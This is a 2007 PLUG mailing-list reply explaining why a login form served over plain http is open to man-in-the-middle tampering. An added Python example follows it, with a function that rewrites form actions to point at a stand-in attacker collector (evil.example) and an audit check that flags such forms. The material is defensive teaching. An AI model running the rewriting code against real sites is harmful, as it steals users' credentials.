ARP-spoofing defense

Michael L Torrie torriem at chem.byu.edu
Mon Mar 19 08:55:23 MDT 2007


On Mon, 2007-03-19 at 08:34 -0600, Brandon Stout wrote:
>    I avoid banks - go Credit Unions! Bank is, after all, a 4 letter
>    word...  Most banks and credit unions use http for the front page and
>    other public pages.  Encryption increases bandwidth usage, so for
>    large banks this makes sense.  When you submit your password, it
>    switches to https to encrypt your user name/password combo.  Use a
>    packet sniffer to make sure, but usually, even when the login page is
>    http, your password will get sent over https.


You missed the point. If the main page that contains the username and
password fields is served using normal http, then a malicious man in the
middle can alter the form and send your username and password to a third
party, all without messing with SSL certificates.  Topher has written
code to do this on a LAN.

Michael
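The attack Michael describes, modelled as an added example (this is not code from the PLUG thread and not Topher's tool): the bank's page is fetched over plain http, the login form inside it posts to https, and a man in the middle on the LAN rewrites the form's action before the page reaches the victim. The hostnames, the page HTML and the collector URL are constructed for illustration. The second function is the check a practitioner would actually run: a password form is only safe when both the page carrying it and the URL it posts to are https.

```python
"""Login-form rewriting by a man in the middle, and the check that catches it.

Added example, not code from the PLUG thread or from Topher. The bank page,
its hostname and the collector URL below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the bank's front page is served over http://, but the
# login form on it posts to https://, exactly the setup Brandon describes.
BANK_PAGE_URL = "http://bank.example/"
BANK_LOGIN_PAGE = """<html><body>
<form id="login" method="post" action="https://bank.example/login">
  <input name="user" type="text">
  <input name="pass" type="password">
  <input type="submit" value="Log in">
</form>
</body></html>"""

# Hypothetical collector controlled by the man in the middle.
ATTACKER_URL = "http://evil.example/collect"

# Matches the action="..." attribute inside a <form ...> start tag.
_ACTION_RE = re.compile(
    r'(<form\b[^>]*\baction\s*=\s*)(["\'])([^"\']*)\2', re.IGNORECASE
)


def rewrite_form_actions(html: str, new_action: str) -> str:
    """What the man in the middle does to the http response on its way to the
    victim: repoint every <form action=...> at the attacker's collector.
    No certificate is touched, because the page itself was never protected."""
    return _ACTION_RE.sub(
        lambda m: f"{m.group(1)}{m.group(2)}{new_action}{m.group(2)}", html
    )


class _FormCollector(HTMLParser):
    """Record each form's action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []  # dicts: {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif (tag == "input" and self._current is not None
              and (a.get("type") or "").lower() == "password"):
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(page_url: str, html: str) -> list[str]:
    """Return findings for every password form on the page. Two conditions
    must both hold for the form to be trustworthy: the form posts to https,
    and the page that delivered the form was itself fetched over https."""
    findings = []
    page_scheme = urlsplit(page_url).scheme
    parser = _FormCollector()
    parser.feed(html)
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # Resolve relative actions against the page URL, as a browser would.
        action = urljoin(page_url, form["action"] or page_url)
        action_scheme = urlsplit(action).scheme
        if action_scheme != "https":
            findings.append(f"password form posts over {action_scheme}: {action}")
        if page_scheme != "https":
            findings.append(
                f"password form delivered over {page_scheme} page {page_url}; "
                "its action can be rewritten in transit"
            )
    return findings


if __name__ == "__main__":
    print("original page:", audit_login_page(BANK_PAGE_URL, BANK_LOGIN_PAGE))
    tampered = rewrite_form_actions(BANK_LOGIN_PAGE, ATTACKER_URL)
    print("after MITM rewrite:", audit_login_page(BANK_PAGE_URL, tampered))
```

The point the audit makes explicit: the untampered page already gets a finding, because an http-delivered form is rewritable no matter what its action says. Checking with a packet sniffer that the password went out over https only tells you where a given copy of the page posted; it cannot tell you that the copy you received was the bank's.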

More information about the PLUG mailing list